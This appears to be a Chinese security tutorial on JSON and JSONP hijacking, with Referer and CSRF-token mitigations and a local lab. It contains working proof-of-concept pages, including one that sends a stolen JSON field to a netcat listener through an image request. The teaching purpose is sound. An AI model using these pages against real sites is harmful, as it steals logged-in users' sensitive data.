概念描述:
json劫持
json劫持攻击又为”JSON Hijacking”,攻击过程有点类似于csrf,只不过csrf只管发送http请求,但是json-hijack的目的是获取敏感数据。
一些web应用会把一些敏感数据以json的形式返回到前端,如果仅仅通过cookie来判断请求是否合法,那么就可以利用类似csrf的手段,向目标服务器发送请求,以获得敏感数据。
比如下面的链接在已登录的情况下会返回json格式的用户信息:
http://www.test.com/userinfo
攻击者可以在自己的虚假页面中,加入如下标签:
1
|
<script src= "http://www.test.com/userinfo" ></script> |
如果当前浏览器已经登录了www.test.com,并且cookie未过期,然后访问了攻击者的虚假页面,那么该页面就可以拿到json形式的用户敏感信息,因为script标签会自动解析json数据,生成对应的js对象。然后再通过
1
|
Object.prototype.__defineSetter__ |
这个函数来触发自己的恶意代码。
<html>
...
<body>
<script type="text/javascript">
Object.prototype.__defineSetter__('Id', function(obj){alert(obj);});
</script>
<script src="http://example.com/Home/AdminBalances"></script>
</body>
</html>
但是这个函数在当前的新版本chrome和firefox中都已经失效了。
jsonp劫持
jsonp是一个非官方的协议,利用script元素的开放策略,网页可以得到从其他来源动态产生的json数据,因此可以用来实现跨域。
web程序如果通过这种方式跨域之后,攻击者完全可以在自己的虚假页面中发起恶意的jsonp请求,这就引来了安全问题。比如:
1
2
3
4
5
6
|
<script> function useUserInfo(v){ alert(v.username); } </script> <script src= "http://www.test.com/userinfo?callback=useUserInfo" ></script> |
如果服务器端的userinfo接口支持jsonp,那就会使虚假页面成功执行useUserInfo函数,从而导致安全问题。
解决方法
其实json劫持和jsonp劫持属于CSRF( Cross-site request forgery 跨站请求伪造)的攻击范畴,所以解决的方法和解决csrf的方法一样。
1、验证 HTTP Referer 头信息;
2、在请求中添加 csrfToken 并在后端进行验证;
本地测试:
创建getuser.php
<?php
header('Content-type: application/json');
$jsoncallback = htmlspecialchars($_REQUEST ['jsoncallback']);//获取回调函数名
//json数据
$json_data='({"id":[{"big":"big1","small":"small1"}],"name":"Aaron"})';
echo $jsoncallback . "(" . $json_data . ")";//输出jsonp格式的数据
?>
再创建一个attack.html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>JSONP劫持测试</title>
</head>
<body>
<script type="text/javascript">
function callbackFunction(result)
{
alert(result.id[0].big);
}
</script>
<script type="text/javascript" src="http://127.0.0.1/jsonp/getUser.php?jsoncallback=callbackFunction"></script>
</body>
</html>
测试JSON劫持:
(1)
(2)修改attack.html:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>JSONP劫持测试</title>
</head>
<body>
<script type="text/javascript">
function callbackFunction(result)
{
var img =new Image()
img.src = "http://127.0.0.1:1111/?testpro="+result.id[0].big
}
</script>
<script type="text/javascript" src="http://127.0.0.1/jsonp/getUser.php?jsoncallback=callbackFunction"></script>
</body>
</html>
本地NC监听1111端口:
访问attack.html